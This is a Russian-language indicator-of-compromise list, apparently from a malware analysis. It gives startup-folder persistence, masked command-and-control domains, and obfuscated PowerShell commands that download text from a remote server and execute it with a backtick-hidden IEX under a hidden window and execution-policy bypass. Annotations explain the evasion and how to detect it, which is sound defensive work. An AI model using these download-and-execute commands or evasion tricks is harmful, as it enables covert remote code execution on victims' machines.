Техническая информация
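- %APPDATA%\microsoft\windows\start menu\programs\startup\run.hta (папка автозагрузки пользователя: файл run.hta открывается при входе пользователя в систему, то есть служит для закрепления)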
- C:\users\public\microsoft.ps1
- 'ah###adel.work':80
- 'ia#####3.us.archive.org':443
- 'ia#####3.us.archive.org':443
- DNS ASK ah###adel.work
- DNS ASK ia#####3.us.archive.org
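- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1
  (здесь -windo и -exec — сокращённые формы параметров -WindowStyle и -ExecutionPolicy: значение 1 соответствует скрытому окну, bypass отключает проверку политики выполнения; правила обнаружения по командной строке должны учитывать сокращённые имена параметров, а не только полные)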
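- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ah###adel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ah###adel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
  (в обеих командах вызов (New-Object Net.WebClient).DownloadString(...) собирается из фрагментов $c1, $c4, $c3, а I`E`X — это IEX (Invoke-Expression), записанный с обратными апострофами, которые PowerShell игнорирует; полученный с сервера текст сразу передаётся на выполнение и этой командой на диск не сохраняется. Поиск подстрок DownloadString или IEX в командной строке такие запуски не находит; надёжнее журналирование блоков сценариев PowerShell (событие 4104), где код виден уже в собранном виде.)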